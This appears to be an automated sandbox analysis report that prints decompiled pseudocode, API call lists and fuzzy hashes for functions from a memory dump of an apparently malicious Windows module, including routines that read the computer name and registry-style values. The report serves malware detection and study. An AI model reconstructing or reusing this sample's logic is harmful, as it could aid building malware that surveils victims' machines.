                                                          0x00000000
                                                          0x047f6323
                                                          0x047f6325
                                                          0x047f6344
                                                          0x047f6344
                                                          0x047f635b
                                                          0x047f635b
                                                          0x047f635c
                                                          0x047f635c
                                                          0x047f635f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x047f635f
                                                          0x047f6329
                                                          0x047f6370
                                                          0x047f6374
                                                          0x047f644e
                                                          0x047f6450
                                                          0x047f6450
                                                          0x047f6451
                                                          0x047f6454
                                                          0x00000000
                                                          0x047f6454
                                                          0x047f637d
                                                          0x047f638e
                                                          0x047f6392
                                                          0x047f644a
                                                          0x00000000
                                                          0x047f644a
                                                          0x047f6398
                                                          0x047f639b
                                                          0x047f639f
                                                          0x047f63a3
                                                          0x047f63a8
                                                          0x047f6440
                                                          0x047f6440
                                                          0x00000000
                                                          0x047f6446
                                                          0x047f63b3
                                                          0x047f63bc
                                                          0x047f63d0
                                                          0x047f63d7
                                                          0x047f63ec
                                                          0x047f63f2
                                                          0x047f63fa
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x047f63fc
                                                          0x047f63fc
                                                          0x047f63fc
                                                          0x047f6403
                                                          0x047f640b
                                                          0x00000000
                                                          0x00000000
                                                          0x047f640d
                                                          0x047f6416
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x047f6418
                                                          0x047f641a
                                                          0x047f641d
                                                          0x047f641d
                                                          0x047f6420
                                                          0x047f6424
                                                          0x047f6427
                                                          0x047f642d
                                                          0x047f6430
                                                          0x047f6437
                                                          0x00000000
                                                          0x047f63b3
                                                          0x047f632e
                                                          0x047f6336
                                                          0x047f633c
                                                          0x047f633e
                                                          0x047f633e
                                                          0x047f6341
                                                          0x047f6343
                                                          0x00000000
                                                          0x047f6343
                                                          0x047f631d
                                                          0x047f6363
                                                          0x047f6368
                                                          0x047f636a
                                                          0x047f636a
                                                          0x047f636d
                                                          0x047f636d
                                                          0x00000000

                                                          APIs
                                                            • Part of subcall function 047FA71F: RtlAllocateHeap.NTDLL(00000000,00000000,047F5595), ref: 047FA72B
                                                          • lstrcpy.KERNEL32(63699BC4,00000020), ref: 047F63D7
                                                          • lstrcat.KERNEL32(63699BC4,00000020), ref: 047F63EC
                                                          • lstrcmp.KERNEL32(00000000,63699BC4), ref: 047F6403
                                                          • lstrlen.KERNEL32(63699BC4), ref: 047F6427
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 3214092121-3916222277
                                                          • Opcode ID: 0f52ec8359da817e8c015a901a5d87886fecf062a755be5495cc0bc42a6066d8
                                                          • Instruction ID: 7b76033430d6c9f1049d3c8fa9ca14702cdfd9ddb2329b6775ecae40ec9eea1f
                                                          • Opcode Fuzzy Hash: 0f52ec8359da817e8c015a901a5d87886fecf062a755be5495cc0bc42a6066d8
                                                          • Instruction Fuzzy Hash: DF519B71A04218EBDF21DF99CC84AADBBB6FF45314F15806AEA159B305C770BA438B90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 047F6545, Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 78%
                                                          			E047F6545(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0; // executed
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E047FA71F(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                                                          0x047f6551
                                                          0x047f6555
                                                          0x047f6556
                                                          0x047f6557
                                                          0x047f6559
                                                          0x047f655b
                                                          0x047f655e
                                                          0x047f6563
                                                          0x047f65fa
                                                          0x047f6601
                                                          0x047f6601
                                                          0x047f656c
                                                          0x047f6573
                                                          0x047f6583
                                                          0x047f6583
                                                          0x047f6589
                                                          0x047f658b
                                                          0x047f6590
                                                          0x047f6599
                                                          0x047f659f
                                                          0x047f65a4
                                                          0x047f65af
                                                          0x047f65b3
                                                          0x047f65b5
                                                          0x047f65b6
                                                          0x047f65bf
                                                          0x047f65c3
                                                          0x047f65d4
                                                          0x047f65c5
                                                          0x047f65ca
                                                          0x047f65cf
                                                          0x047f65de
                                                          0x047f65de
                                                          0x047f65b3
                                                          0x047f65e4
                                                          0x047f65ea
                                                          0x047f65ea
                                                          0x047f65f3
                                                          0x047f65f8
                                                          0x047f65f8
                                                          0x00000000

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: FreeSleepStringlstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 1198164300-0
                                                          • Opcode ID: 6298900cdd7d3f23c8eb5fe4a2df43d84d0cf4de82e4eb795b06ae1ee40d9170
                                                          • Instruction ID: f335f4a404626992d60f170a1b9ba3b9d7ee5708eeae37c42177670699cf9109
                                                          • Opcode Fuzzy Hash: 6298900cdd7d3f23c8eb5fe4a2df43d84d0cf4de82e4eb795b06ae1ee40d9170
                                                          • Instruction Fuzzy Hash: 27213175900209EFDB11DFA4C98899EBBB4FF58314B108169EA05B7314EB30EA02CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 047F8D14, Relevance: 4.6, APIs: 3, Instructions: 94memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E047F8D14(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E047FA2F9(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x47fd2a8; // 0xaea5a8
				_t4 = _t24 + 0x47fedc0; // 0x52e9368
				_t5 = _t24 + 0x47fed68; // 0x4f0053
				_t26 = E047F5356( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x47fd2a8; // 0xaea5a8
						_t11 = _t32 + 0x47fedb4; // 0x52e935c
						_t48 = _t11;
						_t12 = _t32 + 0x47fed68; // 0x4f0053
						_t52 = E047F45C6(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x47fd2a8; // 0xaea5a8
							_t13 = _t35 + 0x47fedfe; // 0x30314549
							if(E047F8E27(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
								_t61 =  *0x47fd25c - 6;
								if( *0x47fd25c <= 6) {
									_t42 =  *0x47fd2a8; // 0xaea5a8
									_t15 = _t42 + 0x47fec0a; // 0x52384549
									E047F8E27(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x47fd2a8; // 0xaea5a8
							_t17 = _t38 + 0x47fedf8; // 0x52e93a0
							_t18 = _t38 + 0x47fedd0; // 0x680043
							_t45 = E047F5D7D(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0x47fd238, 0, _t52);
						}
					}
					HeapFree( *0x47fd238, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E047F4F14(_t54);
				}
				return _t45;
			}


















                                                          0x047f8d14
                                                          0x047f8d24
                                                          0x047f8d27
                                                          0x047f8d2e
                                                          0x047f8d30
                                                          0x047f8d30
                                                          0x047f8d33
                                                          0x047f8d38
                                                          0x047f8d3f
                                                          0x047f8d4c
                                                          0x047f8d51
                                                          0x047f8d55
                                                          0x047f8d63
                                                          0x047f8d71
                                                          0x047f8d75
                                                          0x047f8e06
                                                          0x047f8e06
                                                          0x047f8d7b
                                                          0x047f8d7b
                                                          0x047f8d80
                                                          0x047f8d80
                                                          0x047f8d87
                                                          0x047f8d93
                                                          0x047f8d95
                                                          0x047f8d97
                                                          0x047f8d99
                                                          0x047f8da0
                                                          0x047f8db2
                                                          0x047f8db4
                                                          0x047f8dbb
                                                          0x047f8dbd
                                                          0x047f8dc4
                                                          0x047f8dcf
                                                          0x047f8dcf
                                                          0x047f8dbb
                                                          0x047f8dd4
                                                          0x047f8dd9
                                                          0x047f8de0
                                                          0x047f8dfe
                                                          0x047f8e00
                                                          0x047f8e00
                                                          0x047f8d97
                                                          0x047f8e12
                                                          0x047f8e12
                                                          0x047f8e14
                                                          0x047f8e19
                                                          0x047f8e1b
                                                          0x047f8e1b
                                                          0x047f8e26

                                                          APIs
                                                          • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,052E9368,00000000,?,74B5F710,00000000,74B5F730), ref: 047F8D63
                                                          • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,052E93A0,?,00000000,30314549,00000014,004F0053,052E935C), ref: 047F8E00
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,047F523E), ref: 047F8E12
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: c4103e08c935004e8c13579af7bb0f65d8881c752ca9260917ae6c2f751721e5
                                                          • Instruction ID: ca91a09f30a8dedb5ec8966447db61ad2d84a3724ff2afd6e4e4438e9f532019
                                                          • Opcode Fuzzy Hash: c4103e08c935004e8c13579af7bb0f65d8881c752ca9260917ae6c2f751721e5
                                                          • Instruction Fuzzy Hash: 2731C032A00108BFEB21EBE4DD88EDA7BBDEF48714F054165B601A7320E374AE44DB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 047FA376, Relevance: 4.6, APIs: 3, Instructions: 76memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 53%
                                                          			E047FA376(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* __edi;
				intOrPtr _t18;
				void* _t24;
				void* _t25;
				void* _t30;
				void* _t36;
				void* _t40;
				intOrPtr _t42;

				_t36 = __edx;
				_t32 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t42 =  *0x47fd340; // 0x52e9a88
				_push(0x800);
				_push(0);
				_push( *0x47fd238);
				if( *0x47fd24c >= 5) {
					if(RtlAllocateHeap() == 0) {
						L6:
						_t30 = 8;
						L7:
						if(_t30 != 0) {
							L10:
							 *0x47fd24c =  *0x47fd24c + 1;
							L11:
							return _t30;
						}
						_t44 = _a4;
						_t40 = _v8;
						 *_a16 = _a4;
						 *_a20 = E047F7306(_t44, _t40);
						_t18 = E047F4A09(_t40, _t44);
						if(_t18 != 0) {
							 *_a8 = _t40;
							 *_a12 = _t18;
							if( *0x47fd24c < 5) {
								 *0x47fd24c =  *0x47fd24c & 0x00000000;
							}
							goto L11;
						}
						_t30 = 0xbf;
						E047F6761();
						RtlFreeHeap( *0x47fd238, 0, _t40); // executed
						goto L10;
					}
					_t24 = E047F1F13(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t13);
					L5:
					_t30 = _t24;
					goto L7;
				}
				_t25 = RtlAllocateHeap(); // executed
				if(_t25 == 0) {
					goto L6;
				}
				_t24 = E047F4AB6(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t25); // executed
				goto L5;
			}












                                                          0x047fa376
                                                          0x047fa376
                                                          0x047fa379
                                                          0x047fa37a
                                                          0x047fa384
                                                          0x047fa38b
                                                          0x047fa390
                                                          0x047fa392
                                                          0x047fa398
                                                          0x047fa3c0
                                                          0x047fa3d8
                                                          0x047fa3da
                                                          0x047fa3db
                                                          0x047fa3dd
                                                          0x047fa41b
                                                          0x047fa41b
                                                          0x047fa421
                                                          0x047fa427
                                                          0x047fa427
                                                          0x047fa3df
                                                          0x047fa3e5
                                                          0x047fa3e8
                                                          0x047fa3f7
                                                          0x047fa3f9
                                                          0x047fa400
                                                          0x047fa434
                                                          0x047fa439
                                                          0x047fa43b
                                                          0x047fa43d
                                                          0x047fa43d
                                                          0x00000000
                                                          0x047fa43b
                                                          0x047fa402
                                                          0x047fa407
                                                          0x047fa415
                                                          0x00000000
                                                          0x047fa415
                                                          0x047fa3cf
                                                          0x047fa3d4
                                                          0x047fa3d4
                                                          0x00000000
                                                          0x047fa3d4
                                                          0x047fa39a
                                                          0x047fa3a2
                                                          0x00000000
                                                          0x00000000
                                                          0x047fa3b1
                                                          0x00000000

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800,74B5F710), ref: 047FA39A
                                                            • Part of subcall function 047F4AB6: GetTickCount.KERNEL32 ref: 047F4ACA
                                                            • Part of subcall function 047F4AB6: wsprintfA.USER32 ref: 047F4B1A
                                                            • Part of subcall function 047F4AB6: wsprintfA.USER32 ref: 047F4B37
                                                            • Part of subcall function 047F4AB6: wsprintfA.USER32 ref: 047F4B63
                                                            • Part of subcall function 047F4AB6: HeapFree.KERNEL32(00000000,?), ref: 047F4B75
                                                            • Part of subcall function 047F4AB6: wsprintfA.USER32 ref: 047F4B96
                                                            • Part of subcall function 047F4AB6: HeapFree.KERNEL32(00000000,?), ref: 047F4BA6
                                                            • Part of subcall function 047F4AB6: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 047F4BD4
                                                            • Part of subcall function 047F4AB6: GetTickCount.KERNEL32 ref: 047F4BE5
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800,74B5F710), ref: 047FA3B8
                                                          • RtlFreeHeap.NTDLL(00000000,00000002,047F5289,?,047F5289,00000002,?,?,047F5D5E,?), ref: 047FA415
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Heap$wsprintf$AllocateFree$CountTick
                                                          • String ID:
                                                          • API String ID: 1676223858-0
                                                          • Opcode ID: 595b4be901953c8eee27cd3ce9a371efe4bb52db7eb27ef57e8b0d5cca9fa883
                                                          • Instruction ID: 5c5b5f5b198a5a2dd3956d1b546914a6c78182ae47bcb2412aaad7d790dcce89
                                                          • Opcode Fuzzy Hash: 595b4be901953c8eee27cd3ce9a371efe4bb52db7eb27ef57e8b0d5cca9fa883
                                                          • Instruction Fuzzy Hash: A9211D71200219EBEB119F99DD88EEA37ACEF45354F108026FA06D7340EB74FD459BA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 047F219B, Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 75%
                                                          			E047F219B(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t76 = E047F3AB0(_v8, _a8, _a12, _a20,  &_a20,  &_a12);
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x47fd2a8; // 0xaea5a8
						_t20 = _t68 + 0x47fe1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E047F57B4(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}




















                                                          0x047f21a1
                                                          0x047f21a4
                                                          0x047f21b4
                                                          0x047f21bd
                                                          0x047f21c1
                                                          0x047f228f
                                                          0x047f2295
                                                          0x047f2295
                                                          0x047f21e0
                                                          0x047f21e4
                                                          0x047f21ea
                                                          0x047f21ef
                                                          0x047f21f6
                                                          0x047f2205
                                                          0x047f2205
                                                          0x047f2209
                                                          0x047f220b
                                                          0x047f2217
                                                          0x047f2222
                                                          0x047f222d
                                                          0x047f2231
                                                          0x047f223b
                                                          0x047f223f
                                                          0x047f2241
                                                          0x047f2246
                                                          0x047f224d
                                                          0x047f225d
                                                          0x047f225d
                                                          0x047f2246
                                                          0x047f223f
                                                          0x047f225f
                                                          0x047f2264
                                                          0x047f2269
                                                          0x047f2269
                                                          0x047f226c
                                                          0x047f2275
                                                          0x047f227a
                                                          0x047f227a
                                                          0x047f227f
                                                          0x047f2284
                                                          0x047f2284
                                                          0x047f227f
                                                          0x047f2209
                                                          0x047f2286
                                                          0x047f228c
                                                          0x00000000

                                                          APIs
                                                            • Part of subcall function 047F3AB0: SysAllocString.OLEAUT32(80000002), ref: 047F3B0D
                                                            • Part of subcall function 047F3AB0: SysFreeString.OLEAUT32(00000000), ref: 047F3B73
                                                          • SysFreeString.OLEAUT32(?), ref: 047F227A
                                                          • SysFreeString.OLEAUT32(047F85ED), ref: 047F2284
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: String$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 986138563-0
                                                          • Opcode ID: 61297296b42facfcf8f5126c0071739d54becee42d04f246c2ffa66857e7198f
                                                          • Instruction ID: 4240a627f4e01659aa6f6363c714c7f86e2cf6628ac8f68cc3c455ad9fa1c1ea
                                                          • Opcode Fuzzy Hash: 61297296b42facfcf8f5126c0071739d54becee42d04f246c2ffa66857e7198f
                                                          • Instruction Fuzzy Hash: D4315C71500159AFCB11EF98CD88C9BBB7AFBC97407118A98F9159B311D632ED51CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 047F58DB, Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 37%
                                                          			E047F58DB(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E047FA71F(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E047FA734(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}









                                                          0x047f58e0
                                                          0x047f58eb
                                                          0x047f58ed
                                                          0x047f58f3
                                                          0x047f58f5
                                                          0x047f58fa
                                                          0x047f5903
                                                          0x047f5907
                                                          0x047f5910
                                                          0x047f5914
                                                          0x047f5923
                                                          0x047f5916
                                                          0x047f5917
                                                          0x047f591c
                                                          0x047f591c
                                                          0x047f5914
                                                          0x047f5907
                                                          0x047f592c

                                                          APIs
                                                          • GetComputerNameExA.KERNELBASE(00000003,00000000,047F1FA0,74B5F710,00000000,?,?,047F1FA0), ref: 047F58F3
                                                            • Part of subcall function 047FA71F: RtlAllocateHeap.NTDLL(00000000,00000000,047F5595), ref: 047FA72B
                                                          • GetComputerNameExA.KERNELBASE(00000003,00000000,047F1FA0,047F1FA1,?,?,047F1FA0), ref: 047F5910
                                                            • Part of subcall function 047FA734: HeapFree.KERNEL32(00000000,00000000,047F5637,00000000,?,?,00000000), ref: 047FA740
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: ComputerHeapName$AllocateFree
                                                          • String ID:
                                                          • API String ID: 187446995-0
                                                          • Opcode ID: 71f1ef8aeb596bac09d25eb53bc8972b83eb635b14b92de96e3a98327e48b3bc
                                                          • Instruction ID: dcbf4c8d4b13d19e43444f96085437228a85159ff1c60a429dfc6cc4d50a2f37
                                                          • Opcode Fuzzy Hash: 71f1ef8aeb596bac09d25eb53bc8972b83eb635b14b92de96e3a98327e48b3bc
                                                          • Instruction Fuzzy Hash: 19F05436600249BAEB11D79ACC04EAF77FDDBC5664F260059AA04E3741EA70EE019670
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 047F4ECA, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;

				_t14 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x47fd23c) == 0) {
						E047F1B42();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x47fd23c) == 1) {
						_t10 = E047F12E5(_t11, _t12, _a4); // executed
						if(_t10 != 0) {
							_t14 = 0;
						}
					}
				}
				return _t14;
			}








                                                          0x047f4ed1
                                                          0x047f4ed2
                                                          0x047f4ed5
                                                          0x047f4f07
                                                          0x047f4f09
                                                          0x047f4f09
                                                          0x047f4ed7
                                                          0x047f4ed8
                                                          0x047f4eed
                                                          0x047f4ef4
                                                          0x047f4ef6
                                                          0x047f4ef6
                                                          0x047f4ef4
                                                          0x047f4ed8
                                                          0x047f4f11

                                                          APIs
                                                          • InterlockedIncrement.KERNEL32(047FD23C), ref: 047F4EDF
                                                            • Part of subcall function 047F12E5: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,047F4EF2,?), ref: 047F12F8
                                                          • InterlockedDecrement.KERNEL32(047FD23C), ref: 047F4EFF
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Interlocked$CreateDecrementHeapIncrement
                                                          • String ID:
                                                          • API String ID: 3834848776-0
                                                          • Opcode ID: cac5538ce97e558952256861e8be998191530f59074eb2987da82823c0ce7298
                                                          • Instruction ID: 153834e070e7a50b64e73c1c8e5b53fa00e29f6b54101bec4e4f1585150aa26c
                                                          • Opcode Fuzzy Hash: cac5538ce97e558952256861e8be998191530f59074eb2987da82823c0ce7298
                                                          • Instruction Fuzzy Hash: 93E04F21348135A7A7211EFC9E0CB5FA782EFA0B94F498414EB8BD1310D650F841A695
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 047F48F1, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 34%
                                                          			E047F48F1(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x47fd2a8; // 0xaea5a8
				_t4 = _t15 + 0x47fe39c; // 0x52e8944
				_t20 = _t4;
				_t6 = _t15 + 0x47fe124; // 0x650047
				_t17 = E047F219B(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E047F2298(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}










                                                          0x047f48fb
                                                          0x047f4902
                                                          0x047f4903
                                                          0x047f4904
                                                          0x047f4905
                                                          0x047f490b
                                                          0x047f4910
                                                          0x047f4910
                                                          0x047f491a
                                                          0x047f492c
                                                          0x047f4933
                                                          0x047f4961
                                                          0x047f4935
                                                          0x047f4937
                                                          0x047f493c
                                                          0x047f495e
                                                          0x047f493e
                                                          0x047f4941
                                                          0x047f4948
                                                          0x047f494d
                                                          0x047f494f
                                                          0x047f494f
                                                          0x047f4954
                                                          0x047f4954
                                                          0x047f493c
                                                          0x047f4968

                                                          APIs
                                                            • Part of subcall function 047F219B: SysFreeString.OLEAUT32(?), ref: 047F227A
                                                            • Part of subcall function 047F2298: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,047F84CA,004F0053,00000000,?), ref: 047F22A1
                                                            • Part of subcall function 047F2298: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,047F84CA,004F0053,00000000,?), ref: 047F22CB
                                                            • Part of subcall function 047F2298: memset.NTDLL ref: 047F22DF
